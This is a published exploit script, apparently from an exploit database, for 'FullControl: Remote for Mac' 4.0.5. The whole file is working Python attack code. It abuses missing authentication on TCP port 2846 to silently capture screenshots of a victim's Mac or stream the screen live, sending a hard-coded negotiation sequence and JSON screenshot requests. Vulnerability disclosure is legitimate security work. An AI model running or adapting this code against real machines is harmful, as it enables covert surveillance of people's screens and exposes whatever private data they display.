# Exploit Title: FullControl: Remote for Mac 4.0.5 - Unauthenticated Screen Capture Exploit
# Date: 29/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://fullcontrol.cescobaz.com/
# Software Link: https://apps.apple.com/us/app/fullcontrol-remote-for-mac/id347857890
# Version: 4.0.5
# Tested on: macOS 14.4 Sonoma
'''
Description:
"FullControl: Remote for Mac" 4.0.5 is vulnerable to unauthenticated remote
screenshot capture and live screen streaming due to a lack of
authentication on TCP port 2846. The exploit allows attackers to silently
capture screenshots or continuously stream the victim's screen in real-time
without requiring any credentials.
'''
import socket
import time
import argparse
import cv2
import numpy as np
# Endpoint used as the default for both client classes.
HOST = '192.168.8.103'
PORT = 2846

# Not referenced anywhere in the visible code.
DEBUG = False

# Socket timeouts, in seconds: TIMEOUT is the connect/receive timeout,
# FLUSH_TIMEOUT the short one applied while draining unread input.
TIMEOUT = 30.0
FLUSH_TIMEOUT = 0.5

# Upper bound on buffered bytes while waiting for a complete JPEG (10 MiB).
MAX_JPEG_SIZE = 10 * 1024 * 1024

# Strings sent verbatim, one after another, right after connecting.
NEGOTIATION_PACKETS = [
    'accessibilityAPIEnabled', 'protocol', 'API_level',
    'fc', 'os', 'json2',
    'version', 'fc', 'os', 'device',
    'FullControl', '4.2.0', '4.2.0', '26.0',
    'Attacker',
]
class ScreenshotTaker:
    """Request one screenshot over TCP and write it to disk as a JPEG.

    ``capture()`` opens a connection, sends every entry of
    ``NEGOTIATION_PACKETS``, discards whatever the peer has sent so far,
    sends a single JSON screenshot request and then scans the reply for a
    JPEG delimited by the SOI (``FF D8``) and EOI (``FF D9``) markers.
    """

    def __init__(self, host=HOST, port=PORT):
        """Store the endpoint and build the JSON screenshot request."""
        self.host = host
        self.port = port
        # Not used by this class (capture() works on a local socket); kept
        # so the attribute set stays unchanged.
        self.sock = None
        self.request = (
            '{"Class":"Request","Id":19,"Type":"screenshot",'
            '"Arguments":{"size":"1906.000000;914.000000","quality":0.8,'
            '"rect":"0.000000;0.000000;1906.000000;914.000000","followMouse":1}}'
        )

    def save_screenshot(self, data, filename_prefix="screenshot"):
        """Write *data* to ``<filename_prefix>_<unix time>.jpg``.

        Returns True on success, False when *data* is empty or the file
        could not be written.
        """
        if not data:
            return False
        filename = f"{filename_prefix}_{int(time.time())}.jpg"
        try:
            with open(filename, 'wb') as f:
                f.write(data)
        except OSError as e:
            print(f"[!] Error saving file: {e}")
            return False
        print(f"[+] Saved {len(data)} bytes as {filename}")
        return True

    def flush_input_buffer(self, sock):
        """Best-effort drain of unread bytes on *sock*.

        Reads with a short ``FLUSH_TIMEOUT`` until the peer goes quiet or
        closes, then restores the socket's previous timeout.
        """
        if sock is None:
            return
        original_timeout = sock.gettimeout()
        sock.settimeout(FLUSH_TIMEOUT)
        try:
            while sock.recv(16384):
                pass
        except OSError:
            # Timeouts and would-block errors are OSError subclasses; any
            # socket error simply ends the drain.
            pass
        finally:
            sock.settimeout(original_timeout)

    def receive_screenshot(self, sock):
        """Read from *sock* until one complete JPEG has arrived.

        Returns the JPEG as a ``bytearray``, or None on timeout, socket
        error, peer close, or when more than ``MAX_JPEG_SIZE`` bytes were
        buffered without finding the end marker.
        """
        print("[*] Receiving screenshot data...")
        buffer = bytearray()
        deadline = time.time() + TIMEOUT
        synced = False   # True once the buffer starts at the SOI marker
        scan_from = 2    # where the EOI search resumes (skips the SOI itself)
        while time.time() < deadline:
            try:
                chunk = sock.recv(16384)
            except socket.timeout:
                break
            except OSError as e:
                print(f"[!] Receive error: {e}")
                break
            if not chunk:
                break
            buffer.extend(chunk)
            if not synced:
                soi = buffer.find(b'\xff\xd8')
                if soi != -1:
                    # Drop everything before the JPEG so it starts at 0.
                    del buffer[:soi]
                    synced = True
            if synced:
                eoi = buffer.find(b'\xff\xd9', scan_from)
                if eoi != -1:
                    return buffer[:eoi + 2]
                # Resume one byte back next time: the marker may straddle
                # two chunks. Avoids rescanning the whole buffer each read.
                scan_from = max(2, len(buffer) - 1)
            if len(buffer) > MAX_JPEG_SIZE:
                print("[!] Exceeded max JPEG size")
                return None
        return None

    def connect_and_negotiate(self, sock):
        """Send every negotiation packet on *sock*; return True on success."""
        for pkt in NEGOTIATION_PACKETS:
            try:
                sock.sendall(pkt.encode())
            except OSError as e:
                print(f"[!] Negotiation failed: {e}")
                return False
            # Short pause between the individual sends, as in the original
            # sequence.
            time.sleep(0.01)
        return True

    def capture(self):
        """Connect, negotiate, request one screenshot and save it.

        All failures are reported on stdout; nothing is raised or returned.
        """
        try:
            with socket.create_connection((self.host, self.port),
                                          timeout=TIMEOUT) as sock:
                if not self.connect_and_negotiate(sock):
                    return
                # Wait, then discard whatever was sent in response to the
                # negotiation before issuing the request.
                time.sleep(1.5)
                self.flush_input_buffer(sock)
                sock.sendall(self.request.encode())
                if screenshot := self.receive_screenshot(sock):
                    self.save_screenshot(screenshot)
                else:
                    print("[!] Failed to receive screenshot")
        except OSError as e:
            # Covers timeouts, refused/reset connections and other
            # socket-level failures such as an unreachable host.
            print(f"[!] Connection error: {e}")
        except Exception as e:
            print(f"[!] Unexpected error: {e}")
class LiveStreamer:
    """Repeatedly request screenshots and show them in an OpenCV window.

    One persistent connection is kept in ``self.sock``; bytes received but
    not yet consumed as a frame are kept in ``self.buffer``. Closing the
    connection discards that buffer so data from an old connection is never
    combined with data from a new one.
    """

    def __init__(self, host=HOST, port=PORT):
        """Store the endpoint, the JSON request and the timing settings."""
        self.host = host
        self.port = port
        self.sock = None
        self.buffer = bytearray()
        self.request = (
            '{"Class":"Request","Id":20,"Type":"screenshot",'
            '"Arguments":{"size":"372.000000;178.388248","quality":0.8,'
            '"rect":"0.000000;0.000000;1906.000000;914.000000","followMouse":1}}'
        )
        self.frame_timeout = 3.0  # seconds allowed for one frame to arrive
        self.retry_delay = 1.0    # seconds between negotiation attempts

    def flush_input_buffer(self, sock):
        """Best-effort drain of unread bytes on *sock*.

        Reads with a short ``FLUSH_TIMEOUT`` until the peer goes quiet or
        closes, then restores the socket's previous timeout.
        """
        if sock is None:
            return
        original_timeout = sock.gettimeout()
        sock.settimeout(FLUSH_TIMEOUT)
        try:
            while sock.recv(16384):
                pass
        except OSError:
            # Timeouts and would-block errors are OSError subclasses; any
            # socket error simply ends the drain.
            pass
        finally:
            sock.settimeout(original_timeout)

    def connect_and_negotiate(self, sock):
        """Send the negotiation packets on *sock*, retrying up to 3 times.

        Returns True once a full pass over ``NEGOTIATION_PACKETS`` was sent
        without error, False after the last attempt fails.
        """
        max_retries = 3
        for attempt in range(max_retries):
            try:
                for pkt in NEGOTIATION_PACKETS:
                    sock.sendall(pkt.encode())
                    time.sleep(0.01)
                return True
            except OSError as e:
                if attempt == max_retries - 1:
                    print(f"[!] Negotiation failed: {e}")
                    return False
                print(f"[!] Negotiation attempt {attempt + 1} failed, retrying...")
                time.sleep(self.retry_delay)
        return False

    def _ensure_connection(self):
        """Return True when ``self.sock`` is a connected, negotiated socket.

        Opens and negotiates a new connection if none exists. On any
        failure the socket is closed and reset to None, so a later call
        starts from scratch instead of reusing a half-initialised socket.
        """
        if self.sock is not None:
            return True
        try:
            self.sock = socket.create_connection((self.host, self.port),
                                                 timeout=TIMEOUT)
            if not self.connect_and_negotiate(self.sock):
                self._close_connection()
                return False
            time.sleep(1.5)
            self.flush_input_buffer(self.sock)
            return True
        except OSError as e:
            print(f"[!] Connection error: {e}")
            self._close_connection()
            return False

    def _close_connection(self):
        """Close the socket (ignoring errors) and drop buffered bytes."""
        if self.sock:
            try:
                self.sock.close()
            except OSError:
                pass
        self.sock = None
        # Leftover bytes belong to the connection that was just closed.
        self.buffer.clear()

    def _receive_frame(self):
        """Return the next complete JPEG from the stream, or None.

        Consumes the frame from ``self.buffer``. None is returned when no
        frame arrives within ``self.frame_timeout`` seconds, the peer
        closes the connection, or a socket error occurs.
        """
        deadline = time.monotonic() + self.frame_timeout
        synced = False  # True once the buffer starts at the SOI marker
        while True:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break
            if not synced:
                soi = self.buffer.find(b'\xff\xd8')
                if soi >= 0:
                    del self.buffer[:soi]
                    synced = True
            if synced:
                # Start after the two SOI bytes at the head of the buffer.
                eoi = self.buffer.find(b'\xff\xd9', 2)
                if eoi >= 0:
                    eoi += 2
                    frame = self.buffer[:eoi]
                    del self.buffer[:eoi]
                    return frame
            try:
                if not self._ensure_connection():
                    return None
                sock = self.sock
                saved_timeout = sock.gettimeout()
                # Bound the read by what is left of the frame deadline;
                # otherwise recv() could block for the full socket timeout.
                sock.settimeout(remaining)
                try:
                    chunk = sock.recv(16384)
                finally:
                    sock.settimeout(saved_timeout)
                if not chunk:
                    print("[!] Connection closed by server")
                    self._close_connection()
                    return None
                self.buffer.extend(chunk)
            except socket.timeout:
                continue
            except Exception as e:
                print(f"[!] Receive error: {e}")
                self._close_connection()
                return None
        print("[!] Frame receive timeout")
        return None

    def stream(self):
        """Run the request/decode/display loop until 'q' or Ctrl-C.

        Each iteration sends one request, waits for one frame, decodes it
        and shows it. Connection problems trigger a reconnect after a
        short delay. The socket and the window are always released on exit.
        """
        window_name = "Live Stream"
        cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)
        cv2.resizeWindow(window_name, 800, 600)
        frame_count = 0
        last_frame_time = time.time()
        try:
            while True:
                try:
                    if not self._ensure_connection():
                        print("[!] Reconnecting in 2 seconds...")
                        time.sleep(2.0)
                        continue
                    self.sock.sendall(self.request.encode())
                except Exception as e:
                    print(f"[!] Send error: {e}")
                    self._close_connection()
                    time.sleep(1.0)
                    continue
                frame_data = self._receive_frame()
                if frame_data is None:
                    self._close_connection()
                    time.sleep(1.0)
                    continue
                try:
                    img_array = np.frombuffer(frame_data, dtype=np.uint8)
                    img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
                    if img is not None:
                        cv2.imshow(window_name, img)
                        frame_count += 1
                        now = time.time()
                        elapsed = now - last_frame_time
                        # Report the frame rate roughly once per second.
                        if elapsed >= 1.0:
                            fps = frame_count / elapsed
                            print(f"\r[+] Streaming - FPS: {fps:.1f}",
                                  end="")
                            frame_count = 0
                            last_frame_time = now
                except Exception as e:
                    print(f"[!] Image processing error: {e}")
                if cv2.waitKey(1) & 0xFF == ord('q'):
                    break
        except KeyboardInterrupt:
            print("\n[!] Stream interrupted by user")
        finally:
            self._close_connection()
            cv2.destroyAllWindows()
            print("\n[+] Stream ended")
def main():
    """Parse ``--mode`` and run either a single capture or the live view.

    ``--mode`` accepts ``screenshot`` (the default) or ``live``; any other
    value makes argparse exit with a usage error.
    """
    parser = argparse.ArgumentParser(
        description='Capture device screenshots or stream live video')
    parser.add_argument('--mode', choices=['screenshot', 'live'],
                        default='screenshot',
                        help='Operation mode: screenshot or live streaming')
    args = parser.parse_args()
    if args.mode == 'screenshot':
        taker = ScreenshotTaker()
        taker.capture()
    elif args.mode == 'live':
        streamer = LiveStreamer()
        streamer.stream()


if __name__ == "__main__":
    main()